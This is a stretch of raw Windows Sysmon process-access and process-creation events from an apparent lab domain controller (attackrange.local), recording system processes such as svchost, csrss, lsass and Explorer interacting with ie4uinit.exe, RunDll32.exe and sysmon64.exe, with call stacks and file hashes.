13:58:23.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:23.664{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.664{59A5CD1D-93FF-6005-0005-00000000A301}30803692C:\Windows\System32\ie4uinit.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ie4uinit.exe+2d19|C:\Windows\System32\ie4uinit.exe+33b8|C:\Windows\System32\ie4uinit.exe+245e7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000011188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.679{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe11.00.14393.2999 (rs1_release_inmarket.190520-1518)IE Per-User Initialization UtilityInternet ExplorerMicrosoft CorporationIE4UINIT.EXEC:\Windows\System32\ie4uinit.exe -ClearIconCacheC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=8450580ADC40581006B7233F2B2803EB,SHA256=DD7FE0DBD6BD3B66437C093B707D1B2CA8AC72E4671B88829A4327FA6B8A00BD,IMPHASH=A9F54FA8B3C0ECA158788E684C66CA9A{59A5CD1D-93FF-6005-0005-00000000A301}3080C:\Windows\System32\ie4uinit.exe"C:\Windows\System32\ie4uinit.exe" -UserConfig 10341000x800000000000000011187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:23.227{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-93FF-6005-0005-00000000A301}3080C:\Windows\System32\ie4uinit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.227{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93FF-6005-0005-00000000A301}3080C:\Windows\System32\ie4uinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:23.211{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\shsvcs.dll+11f99|c:\windows\system32\shsvcs.dll+11ba6|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:23.211{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x101068C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\shsvcs.dll+11f27|c:\windows\system32\shsvcs.dll+11ba6|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000011182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.149{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-93FF-6005-0005-00000000A301}3080C:\Windows\System32\ie4uinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:23.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:23.133{59A5CD1D-93FA-6005-FC04-00000000A301}37843160C:\Windows\Explorer.EXE{59A5CD1D-93FF-6005-0005-00000000A301}3080C:\Windows\System32\ie4uinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+551ba4|C:\Windows\System32\SHELL32.dll+551600|C:\Windows\System32\SHELL32.dll+551774|C:\Windows\System32\SHELL32.dll+203065|C:\Windows\System32\SHELL32.dll+202f20|C:\Windows\System32\SHELL32.dll+45f51 154100x800000000000000011177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.143{59A5CD1D-93FF-6005-0005-00000000A301}3080C:\Windows\System32\ie4uinit.exe11.00.14393.2999 (rs1_release_inmarket.190520-1518)IE Per-User Initialization UtilityInternet ExplorerMicrosoft CorporationIE4UINIT.EXE"C:\Windows\System32\ie4uinit.exe" -UserConfigC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=8450580ADC40581006B7233F2B2803EB,SHA256=DD7FE0DBD6BD3B66437C093B707D1B2CA8AC72E4671B88829A4327FA6B8A00BD,IMPHASH=A9F54FA8B3C0ECA158788E684C66CA9A{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x800000000000000011220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:24.055{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-9400-6005-0305-00000000A301}5028C:\Windows\system32\RunDll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.055{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-9400-6005-0305-00000000A301}5028C:\Windows\system32\RunDll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:24.055{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-9400-6005-0205-00000000A301}3532C:\Windows\system32\RunDll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.055{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-9400-6005-0205-00000000A301}3532C:\Windows\system32\RunDll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:24.055{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9400-6005-0305-00000000A301}5028C:\Windows\system32\RunDll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.055{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9400-6005-0305-00000000A301}5028C:\Windows\system32\RunDll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.055{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9400-6005-0205-00000000A301}3532C:\Windows\system32\RunDll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:24.055{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9400-6005-0205-00000000A301}3532C:\Windows\system32\RunDll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:24.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:24.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.039{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-9400-6005-0305-00000000A301}5028C:\Windows\system32\RunDll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
